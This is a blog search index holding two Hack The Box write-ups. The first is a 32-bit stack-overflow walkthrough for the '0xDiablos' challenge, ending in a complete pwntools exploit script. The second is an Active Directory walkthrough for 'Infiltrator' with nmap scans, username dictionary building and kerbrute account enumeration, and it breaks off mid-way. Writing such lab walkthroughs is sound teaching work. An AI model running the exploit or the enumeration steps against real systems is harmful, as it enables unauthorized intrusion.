<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>HTB-You know 0xDiablos</title>
<link href="/2024/09/07/HTB-You%20know%200xDiablos/"/>
<url>/2024/09/07/HTB-You%20know%200xDiablos/</url>
<content type="html"><![CDATA[<h1 id="引言"><a href="#引言" class="headerlink" title="Introduction"></a>Introduction</h1><ul><li><strong>Project overview</strong>: the HTB Easy-difficulty PWN challenge "You know 0xDiablos" (<a href="https://app.hackthebox.com/challenges/106">https://app.hackthebox.com/challenges/106</a>). This post explains in detail how the overflow payload is structured and why it is built that way, as a beginner-friendly walkthrough of the underlying principle for anyone starting out in PWN.</li><li><strong>Techniques covered</strong>: 32-bit Linux reverse engineering, the 32-bit calling convention, stack overflow</li><li><strong>Audience</strong>: security enthusiasts, PWN beginners</li></ul><h1 id="基本情况"><a href="#基本情况" class="headerlink" title="Basic situation"></a>Basic situation</h1><p>Run it and see:</p><figure class="highlight plaintext"><pre><code>└─$ ./vuln 
You know who are 0xDiablos: 
aaaa
aaaa</code></pre></figure><p>Whatever you type, it echoes back.</p><p>Check the protections with checksec:</p><figure class="highlight plaintext"><pre><code>─$ checksec vuln 
[*] '/home/att/htb/Youknow0xDiablos/vuln'
 Arch: i386-32-little
 RELRO: Partial RELRO
 Stack: No canary found
 NX: NX unknown - GNU_STACK missing
 PIE: No PIE (0x8048000)
 Stack: Executable
 RWX: Has RWX segments</code></pre></figure><p>In other words, there are no protections at all: a genuine beginner exercise, so we can concentrate on the core principle of the stack overflow.</p><h1 id="逆向分析"><a href="#逆向分析" class="headerlink" title="Reverse engineering"></a>Reverse engineering</h1><p>Load the program into IDA.</p><p><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907192543.png"></p><p>In the main function there is a function called vuln,<br>which should be our target.<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907192819.png"><br><code>gets()</code> is a textbook dangerous function.</p><p>Here the array s sits 0xB8 bytes below ebp.<br>Since the program calls gets(s), we can use the s array to overflow:<br><code>junk = b'a'*0xB8</code></p><p>Picture it: we write a large amount of junk, starting somewhere on the stack and continuing all the way to the bottom of the frame. The slot the frame pointer EBP points at holds the parent function's saved EBP value, and the slot at EBP+0x4 holds the current function's return address (the address of the instruction following the call in the parent function).<br>So if we write just a little more, we can change how the function runs.</p><p>The attack payload can therefore be roughly built like this:<br><code>payload = junk + ebp + ret</code><br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907213154.png"><br>Clearly, the function I am meant to analyze is flag.<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907201336.png"><br>The flag function opens flag.txt and, if the comparison of its two arguments succeeds, returns what it read.<br>That means I also have to set up the two arguments on the stack.<br>The final payload roughly has this structure:<br><code>payload = junk + ebp + ret + ret2 + arg1 + arg2</code></p><h2 id="call逻辑讲解"><a href="#call逻辑讲解" class="headerlink" title="How a call works"></a>How a call works</h2><p>Here is why the payload is built this way.<br>IDA's F5 produces pseudo-C, so the calling convention is the C calling convention:<br>in a 32-bit program the arguments are pushed onto the stack from right to left.</p><p>A normal call to flag proceeds as follows:</p><figure class="highlight plaintext"><pre><code>push arg2
push arg1

call flag_addr

xxxcommand

flag:
/* Entering the function is equivalent to the following two operations; I am using assembly as an analogy here, these two instructions are not actually executed
push ret (the address of xxxcommand)
mov eip, flag_addr
*/

 ; prologue: save the caller's ebp and set up the new frame
 push ebp
 mov ebp, esp

 ; access the first argument (into eax)
 mov eax, [ebp + 8]

 ; access the second argument (into ebx)
 mov ebx, [ebp + 12]

 ; function body
 ; ...

 ; epilogue: tear down the frame and return to the saved return address
 mov esp, ebp
 pop ebp
 ret
</code></pre></figure><p>To forge a call, I have to lay out the argument slots on the stack myself, and I must keep in mind that I am using ret rather than call: ret does not push an address. Below I explain in detail why the payload is constructed this way and why its fields are ordered as they are.</p><figure class="highlight plaintext"><pre><code>Stack for a normal call

ebp_the EBP value of the function that called flag (the first instruction after entering the function is push ebp; I indent this with a Tab to distinguish it from the content that was already there)

ret_addr_the address of the instruction after the call to flag
arg1
arg2</code></pre></figure><p>To call flag, I have to overwrite the return address with flag's address.<br>The rough payload layout is as follows:</p><figure class="highlight plaintext"><pre><code>xxxxx junk data
+
ebp_the ebp of the function that called flag
+
address of flag()</code></pre></figure><p>And flag also takes arguments:</p><figure class="highlight plaintext"><pre><code>xxxxx junk data
+
ebp_any EBP value; we never return to main anyway
+
address of flag()
+
 (dropped from the payload; deduced from the result) ebp_any EBP value; we never return to vuln anyway (only a normal call needs this), here we jump straight to flag() with ret
+
ret_the return address back into vuln. I keep this slot, and it is a return address rather than an ebp, because at the moment execution enters flag() the top of the stack should hold the return address, not ebp; only the first instruction `push ebp` then writes ebp to the top of the stack, and when flag() finishes it ultimately returns to this address

+
arg1
+
arg2</code></pre></figure><p>So the 32-bit payload is built like this:</p><figure class="highlight plaintext"><pre><code>payload = junk + ebp + ret + ret2 + arg1 + arg2</code></pre></figure><p><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907204425.png"></p><p>Send the payload.</p><p>You can see that at the moment flag is entered,<br>the top of the stack looks like this. <code>push ebp</code> has not executed yet, so if this were a normal call, this slot would hold the address of the instruction after the call to flag(), i.e. the address flag() returns to when it finishes. The ebp value here is <code>0x62626262</code> because <code>ebp=b'b'*4</code>: four arbitrary 'b' characters that I put there as a placeholder.</p><figure class="highlight plaintext"><pre><code>0xffce8ac0: 0xdeadbeef63636363 </code></pre></figure><p>The complete PoC:</p><figure class="highlight python"><pre><code>from pwn import *

target='./vuln'
# once context.binary is set to the target program, helpers such as pack() automatically pack for the target's word size

context.binary = target
e = ELF(target)
# remote connection
r=remote('83.136.253.163', 37682)

# run locally
# r=process(target)

# run locally under gdb
# r=gdb.debug(target)
junk=b'a'*0xB8
ebp=b'b'*4
ret=0x080491E2
ret2=b'c'*4
arg1=0xDEADBEEF
arg2=0xC0DED00D
# pack() follows the context.binary environment; since this is a 32-bit executable, pack is equivalent to p32 here, packing as 32-bit little-endian
payload=junk+ebp+pack(ret)+ret2+pack(arg1)+pack(arg2)
# print(payload)
tmp=r.sendlineafter(b'You know who are 0xDiablos:', payload)
# switch to interactive mode so we don't have to keep printing the output
r.interactive()</code></pre></figure>]]></content>
<categories>
<category> hack-the-box </category>
</categories>
<tags>
<tag> HTB </tag>
<tag> stack overflow </tag>
</tags>
</entry>
<entry>
<title>HTB-Infiltrator</title>
<link href="/2024/09/07/HTB-Infiltrator/"/>
<url>/2024/09/07/HTB-Infiltrator/</url>
<content type="html"><![CDATA[<h1 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h1><ul><li><strong>项目概述</strong>:hack the box的赛季靶机Infiltrator,难度Insane,竟恐怖如斯。本文带你轻松愉悦的感受顶级难度的靶机之旅。由于域渗透过程详细,可以说一文带你走进域渗透。</li><li><strong>技术点涉及</strong>: 端口扫描、域渗透准备工作、WEB渗透、用户名信息搜集以及字典构造、密码喷射、Kerberos、HASH破解、bloodhound、权限维持、提权、mysql读取任意文件、mysq写入文件、未知路径猜测、PHP命令执行</li><li><strong>目标与读者</strong>:网络安全兴趣爱好者、红队选手</li></ul><h1 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 21:00 EDT</span><br><span class="line">Nmap scan report for 10.10.11.31</span><br><span class="line">Host is up (0.38s latency).</span><br><span class="line">Not shown: 65511 filtered tcp ports (no-response)</span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">53/tcp open 
domain</span><br><span class="line">80/tcp open http</span><br><span class="line">88/tcp open kerberos-sec</span><br><span class="line">135/tcp open msrpc</span><br><span class="line">139/tcp open netbios-ssn</span><br><span class="line">389/tcp open ldap</span><br><span class="line">445/tcp open microsoft-ds</span><br><span class="line">464/tcp open kpasswd5</span><br><span class="line">593/tcp open http-rpc-epmap</span><br><span class="line">636/tcp open ldapssl</span><br><span class="line">3268/tcp open globalcatLDAP</span><br><span class="line">3269/tcp open globalcatLDAPssl</span><br><span class="line">3389/tcp open ms-wbt-server</span><br><span class="line">5985/tcp open wsman</span><br><span class="line">9389/tcp open adws</span><br><span class="line">15220/tcp open unknown</span><br><span class="line">15230/tcp open unknown</span><br><span class="line">49667/tcp open unknown</span><br><span class="line">49690/tcp open unknown</span><br><span class="line">49691/tcp open unknown</span><br><span class="line">49694/tcp open unknown</span><br><span class="line">49723/tcp open unknown</span><br><span class="line">49746/tcp open unknown</span><br><span class="line">49879/tcp open unknown</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 170.18 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>详细扫描</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 
class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span 
class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line"># Nmap 7.94SVN scan initiated Thu Sep 5 21:03:50 2024 as: nmap -sT -Pn -sV -sC -O -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,15220,15230,49667,49690,49691,49694,49723,49746,49879 -oA nmapscan/detail 10.10.11.31</span><br><span class="line">Nmap scan report for 10.10.11.31</span><br><span class="line">Host is up (0.72s latency).</span><br><span class="line"></span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">53/tcp open domain Simple DNS Plus</span><br><span class="line">80/tcp open http Microsoft IIS httpd 10.0</span><br><span class="line">|_http-title: Infiltrator.htb</span><br><span class="line">| http-methods: </span><br><span class="line">|_ Potentially risky methods: TRACE</span><br><span class="line">|_http-server-header: Microsoft-IIS/10.0</span><br><span class="line">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-06 00:53:54Z)</span><br><span class="line">135/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">139/tcp open netbios-ssn Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:50+00:00; -10m07s from scanner time.</span><br><span class="line">| ssl-cert: Subject: </span><br><span class="line">| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR</span><br><span class="line">| Not valid before: 2024-08-04T18:48:15</span><br><span class="line">|_Not valid after: 2099-07-17T18:48:15</span><br><span class="line">445/tcp open microsoft-ds?</span><br><span class="line">464/tcp open kpasswd5?</span><br><span 
class="line">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">| ssl-cert: Subject: </span><br><span class="line">| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR</span><br><span class="line">| Not valid before: 2024-08-04T18:48:15</span><br><span class="line">|_Not valid after: 2099-07-17T18:48:15</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:49+00:00; -10m07s from scanner time.</span><br><span class="line">3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:51+00:00; -10m07s from scanner time.</span><br><span class="line">| ssl-cert: Subject: </span><br><span class="line">| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR</span><br><span class="line">| Not valid before: 2024-08-04T18:48:15</span><br><span class="line">|_Not valid after: 2099-07-17T18:48:15</span><br><span class="line">3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)</span><br><span class="line">| ssl-cert: Subject: </span><br><span class="line">| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR</span><br><span class="line">| Not valid before: 2024-08-04T18:48:15</span><br><span class="line">|_Not valid after: 2099-07-17T18:48:15</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:49+00:00; -10m07s from scanner time.</span><br><span class="line">3389/tcp open ms-wbt-server Microsoft Terminal Services</span><br><span class="line">| rdp-ntlm-info: </span><br><span class="line">| Target_Name: INFILTRATOR</span><br><span class="line">| NetBIOS_Domain_Name: INFILTRATOR</span><br><span 
class="line">| NetBIOS_Computer_Name: DC01</span><br><span class="line">| DNS_Domain_Name: infiltrator.htb</span><br><span class="line">| DNS_Computer_Name: dc01.infiltrator.htb</span><br><span class="line">| DNS_Tree_Name: infiltrator.htb</span><br><span class="line">| Product_Version: 10.0.17763</span><br><span class="line">|_ System_Time: 2024-09-06T00:57:05+00:00</span><br><span class="line">| ssl-cert: Subject: commonName=dc01.infiltrator.htb</span><br><span class="line">| Not valid before: 2024-07-30T13:20:17</span><br><span class="line">|_Not valid after: 2025-01-29T13:20:17</span><br><span class="line">|_ssl-date: 2024-09-06T00:57:49+00:00; -10m08s from scanner time.</span><br><span class="line">5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">9389/tcp open mc-nmf .NET Message Framing</span><br><span class="line">15220/tcp open unknown</span><br><span class="line">15230/tcp open unknown</span><br><span class="line">49667/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">49691/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49694/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49723/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49746/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">49879/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</span><br><span class="line">Device type: general purpose</span><br><span class="line">Running (JUST GUESSING): Microsoft Windows 2019 (88%)</span><br><span class="line">Aggressive OS guesses: Microsoft Windows Server 2019 (88%)</span><br><span class="line">No exact OS 
matches for host (test conditions non-ideal).</span><br><span class="line">Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">| 3:1:1: </span><br><span class="line">|_ Message signing enabled and required</span><br><span class="line">|_clock-skew: mean: -10m07s, deviation: 0s, median: -10m07s</span><br><span class="line">| smb2-time: </span><br><span class="line">| date: 2024-09-06T00:57:10</span><br><span class="line">|_ start_date: N/A</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>整理结果<br>端口</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,15220,15230,49667,49690,49691,49694,49723,49746,49879</span><br></pre></td></tr></table></figure><p>域名</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">infiltrator.htb</span><br></pre></td></tr></table></figure><p>主机</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dc01.infiltrator.htb</span><br></pre></td></tr></table></figure><h1 id="域渗透准备工作"><a href="#域渗透准备工作" class="headerlink" title="域渗透准备工作"></a>域渗透准备工作</h1><p>配置dnsserver</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim /etc/resolv.conf</span><br></pre></td></tr></table></figure><p>添加目标机器为dns服务器</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat /etc/resolv.conf </span><br><span class="line"># Generated by NetworkManager</span><br><span class="line">nameserver 10.10.11.31</span><br><span class="line">nameserver 192.168.122.1</span><br></pre></td></tr></table></figure><p>检查解析结果</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">└─$ nslookup dc01.infiltrator.htb</span><br><span class="line">Server: 10.10.11.31</span><br><span class="line">Address: 10.10.11.31#53</span><br><span class="line"></span><br><span class="line">Name: dc01.infiltrator.htb</span><br><span class="line">Address: 10.10.11.31</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>解析成功,证明dns服务器配置完成,虽然配置<code>/etc/hosts</code>也可以做到<br>但是,遇到大型目标还是乖乖配置dns服务器为好</p><h1 id="WEB渗透"><a href="#WEB渗透" class="headerlink" title="WEB渗透"></a>WEB渗透</h1><p>80端口<br>发现有个团队介绍<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240906094111.png"></p><p>使用xpath提取<br>#curl #xpath</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s http://dc01.infiltrator.htb | xmllint --html --xpath "//div/div/h4" - </span><br></pre></td></tr></table></figure><p>复制需要的部分写入到tmp文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><h4>.01 David Anderson</h4></span><br><span 
class="line"><h4>.02 Olivia Martinez</h4></span><br><span class="line"><h4>.03 Kevin Turner</h4></span><br><span class="line"><h4>.04 Amanda Walker</h4></span><br><span class="line"><h4>.05 Marcus Harris</h4></span><br><span class="line"><h4>.06 Lauren Clark</h4></span><br><span class="line"><h4>.07 Ethan Rodriguez</h4></span><br></pre></td></tr></table></figure><p>awk切分tmp文件为自己要的部分</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk -F'>|<' '{print substr($3,5)}' tmp > username</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat username </span><br><span class="line">David Anderson</span><br><span class="line">Olivia Martinez</span><br><span class="line">Kevin Turner</span><br><span class="line">Amanda Walker</span><br><span class="line">Marcus Harris</span><br><span class="line">Lauren Clark</span><br><span class="line">Ethan Rodriguez</span><br></pre></td></tr></table></figure><p>很nice</p><h1 id="SMB渗透"><a href="#SMB渗透" class="headerlink" title="SMB渗透"></a>SMB渗透</h1><p>现在需要确认目标系统的账号</p><p>一般登录域用户的账号是长这个样子</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username@xxxx.com</span><br></pre></td></tr></table></figure><p>#awk #生成域用户字典 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">awk ' </span><br><span class="line"> {</span><br><span class="line"> name = $0</span><br><span class="line"> split(name, parts, " ")</span><br><span class="line"> first = tolower(parts[1])</span><br><span class="line"> last = tolower(parts[2])</span><br><span class="line"> print first "." last "@infiltrator.htb"</span><br><span class="line"> print first "_" last "@infiltrator.htb"</span><br><span class="line"> print substr(first, 1, 1) "." last "@infiltrator.htb"</span><br><span class="line"> print substr(first, 1, 1) "_" last "@infiltrator.htb"</span><br><span class="line"> }</span><br><span class="line">' username > AD_username</span><br></pre></td></tr></table></figure><p>现在需要取碰撞那些用户存在了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span 
class="line">└─$ cat AD_username </span><br><span class="line">david.anderson@infiltrator.htb</span><br><span class="line">david_anderson@infiltrator.htb</span><br><span class="line">d.anderson@infiltrator.htb</span><br><span class="line">d_anderson@infiltrator.htb</span><br><span class="line">olivia.martinez@infiltrator.htb</span><br><span class="line">olivia_martinez@infiltrator.htb</span><br><span class="line">o.martinez@infiltrator.htb</span><br><span class="line">o_martinez@infiltrator.htb</span><br><span class="line">kevin.turner@infiltrator.htb</span><br><span class="line">kevin_turner@infiltrator.htb</span><br><span class="line">k.turner@infiltrator.htb</span><br><span class="line">k_turner@infiltrator.htb</span><br><span class="line">amanda.walker@infiltrator.htb</span><br><span class="line">amanda_walker@infiltrator.htb</span><br><span class="line">a.walker@infiltrator.htb</span><br><span class="line">a_walker@infiltrator.htb</span><br><span class="line">marcus.harris@infiltrator.htb</span><br><span class="line">marcus_harris@infiltrator.htb</span><br><span class="line">m.harris@infiltrator.htb</span><br><span class="line">m_harris@infiltrator.htb</span><br><span class="line">lauren.clark@infiltrator.htb</span><br><span class="line">lauren_clark@infiltrator.htb</span><br><span class="line">l.clark@infiltrator.htb</span><br><span class="line">l_clark@infiltrator.htb</span><br><span class="line">ethan.rodriguez@infiltrator.htb</span><br><span class="line">ethan_rodriguez@infiltrator.htb</span><br><span class="line">e.rodriguez@infiltrator.htb</span><br><span class="line">e_rodriguez@infiltrator.htb</span><br></pre></td></tr></table></figure><p>For this I use <a href="https://github.com/ropnop/kerbrute">ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing (github.com)</a>. It needs no credentials: it sends an AS-REQ without pre-authentication for each name, and the KDC answers KDC_ERR_PREAUTH_REQUIRED for existing accounts and KDC_ERR_C_PRINCIPAL_UNKNOWN for unknown ones, without touching any failed-logon counter.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">go install -v 
github.com/ropnop/kerbrute@latest</span><br></pre></td></tr></table></figure><p>I have the DC configured as my DNS server, so kerbrute locates the KDC on its own:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">└─$ kerbrute userenum -d infiltrator.htb AD_username </span><br><span class="line"></span><br><span class="line"> __ __ __ </span><br><span class="line"> / /_____ _____/ /_ _______ __/ /____ </span><br><span class="line"> / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \</span><br><span class="line"> / ,< / __/ / / /_/ / / / /_/ / /_/ __/</span><br><span class="line">/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ </span><br><span class="line"></span><br><span class="line">Version: dev (n/a) - 09/05/24 - Ronnie Flathers @ropnop</span><br><span class="line"></span><br><span class="line">2024/09/05 22:23:05 > Using KDC(s):</span><br><span class="line">2024/09/05 22:23:05 > dc01.infiltrator.htb:88</span><br><span class="line"></span><br><span class="line">2024/09/05 22:23:06 > [+] VALID USERNAME: o.martinez@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:06 > [+] VALID USERNAME: d.anderson@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:09 > [+] VALID USERNAME: k.turner@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:09 > [+] VALID USERNAME: 
a.walker@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:10 > [+] VALID USERNAME: m.harris@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:10 > [+] VALID USERNAME: e.rodriguez@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:13 > [+] VALID USERNAME: l.clark@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:13 > Done! Tested 28 usernames (7 valid) in 8.431 seconds</span><br></pre></td></tr></table></figure><p>If you have not configured DNS, add <code>--dc dc01.infiltrator.htb</code> (or the DC's IP address), so the command becomes</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerbrute userenum -d infiltrator.htb AD_username --dc dc01.infiltrator.htb</span><br></pre></td></tr></table></figure><p>Write the following lines into tmp:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">2024/09/05 22:23:06 > [+] VALID USERNAME: o.martinez@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:06 > [+] VALID USERNAME: d.anderson@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:09 > [+] VALID USERNAME: k.turner@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:09 > [+] VALID USERNAME: a.walker@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:10 > [+] VALID USERNAME: m.harris@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:10 > [+] VALID USERNAME: e.rodriguez@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:13 > [+] VALID USERNAME: l.clark@infiltrator.htb</span><br></pre></td></tr></table></figure><p>Split with awk once more (the account is the seventh space-separated field) to get the list of confirmed usernames:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
